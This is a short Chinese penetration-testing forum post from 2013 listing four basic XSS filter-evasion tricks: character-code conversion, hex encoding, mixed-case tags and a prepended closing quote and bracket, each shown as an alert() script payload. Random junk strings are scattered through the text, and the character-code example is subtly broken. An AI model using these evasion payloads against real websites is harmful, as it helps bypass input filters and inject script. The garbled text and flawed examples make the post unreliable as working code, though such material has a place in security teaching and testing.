中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]
作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。
+ S) r# k: l  Z$ z8 Z1.转换为ASCII码- q( Y) E/ F2 \. L
例子:原脚本为<script>alert(‘I love F4ck’)</script >
0 V; x# v! _9 y& k# N1 s通过转换,变成:
2 n2 M8 z2 f$ I7 G<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script># \+ h, C& a  }; e

( ~$ {+ _) h8 b) J* F! E2.转换为HEX(十六进制)
1 X; V# ?  z# o' I% a4 N* ?" J例子:原脚本为<script>alert(‘I love F4ck’)</script>2 B( ^* Y8 l: W" N2 |, S/ e; t
通过转换,变成:
2 L7 a: ]8 f8 J. Z: R% ^%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e- S1 d( C8 d8 o. X7 f8 G
0 V* T) i! o8 q3 `
3.转换脚本的大小写: B; ~1 x) X1 S! C
例子:原脚本为<script>alert(‘I love F4ck’)</script>5 o) n4 t: P& Y) O* f4 w
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
9 @$ w* g* K* Z " Y& L5 c; D; E- ]' h8 |7 c8 _
4.增加闭合标记”>
, ^3 p3 Z. W1 d& u  B( ]$ O+ ]例子:原脚本为<script>alert(‘I love F4ck’)</script>
8 }) T9 |! X% ]2 N1 l( ^, x' ~$ k# L0 `转换为:”><script>alert(‘I love F4ck’)</script>+ M" g0 d+ c/ ?: \& g. ~) {
更详细绕过技术请参考此网页
" {. z2 T: [5 }8 G3 ^https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet1 k% |  Q, y% B) \' P0 ~
$ h4 a7 N+ ~5 j' _& `
转换工具使用的是火狐的 hackbar mozilla addon.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2